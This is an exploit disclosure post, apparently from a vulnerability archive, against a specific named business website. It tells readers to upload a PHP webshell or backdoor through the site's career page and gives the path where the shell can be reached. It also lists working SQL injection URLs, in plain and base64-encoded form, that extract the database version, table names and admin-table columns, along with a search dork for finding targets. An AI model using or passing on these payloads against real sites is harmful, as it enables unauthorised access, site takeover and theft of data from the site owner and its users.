Sujal Enterprise FIle Upload Vulnerability

2019.04.09
dz Dj3Bb4rAn0n_Dz (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=============================================================== # Title : Sujal Enterprise FIle Upload Vulnerability # Author : Dj3Bb4rAn0n (bassem) FB/djebbar.bassem.16 # Date : /08/04/2019 # Home : Annaba ( Algeria ) # Tested on : Linux ( Backbox ) # Vendor : Sujal Enterprise # Dork : =============================================================== # PoC : ----- --------------------------------------------------------------- # [ 1 ] File Upload Vulnerability # Upload Your melcious php backdoor or webshell from this link : http://sujalenterprise.in/career.php # To display the webshell use this link : http://sujalenterprise.in/img/career/[ WEBSHELL NAME ] ----------------------------------------------------------------- # [ 2 ] BASE64 xpath Sql injection Vulnerability # Search for any injection point from google using this dork : site:http://sujalenterprise.in .php?id # Use single quoat as a payload [ ' ] # Version : http://sujalenterprise.in/product_details.php?id=NjQgICBhbmQgZXh0cmFjdHZhbHVlKDB4MGEsY29uY2F0KDB4MGEsKHNlbGVjdCB2ZXJzaW9uKCkpKSk= : http://sujalenterprise.in/product_details.php?id=64 and extractvalue(0x0a,concat(0x0a,(select version()))) # Tables : http://sujalenterprise.in/product_details.php?id=NjQgICAgYW5kIGV4dHJhY3R2YWx1ZSgweDBhLGNvbmNhdCgweDBhLChzZWxlY3QgdGFibGVfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgbGltaXQgMCwxKSkp # http://sujalenterprise.in/product_details.php?id=64 and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit [ Put limit ],1))) # Columns : http://sujalenterprise.in/product_details.php?id=NjQgICAgIGFuZCBleHRyYWN0dmFsdWUoMHgwYSxjb25jYXQoMHgwYSwoc2VsZWN0IGNvbHVtbl9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPURBVEFCQVNFKCkgYW5kIHRhYmxlX25hbWU9MHg3NDYyNmM1ZjYxNjQ2ZDY5NmUgbGltaXQgMSwxKSkp # http://sujalenterprise.in/product_details.php?id=64 and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x74626c5f61646d696e limit [ PUt Limit ],1)))


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top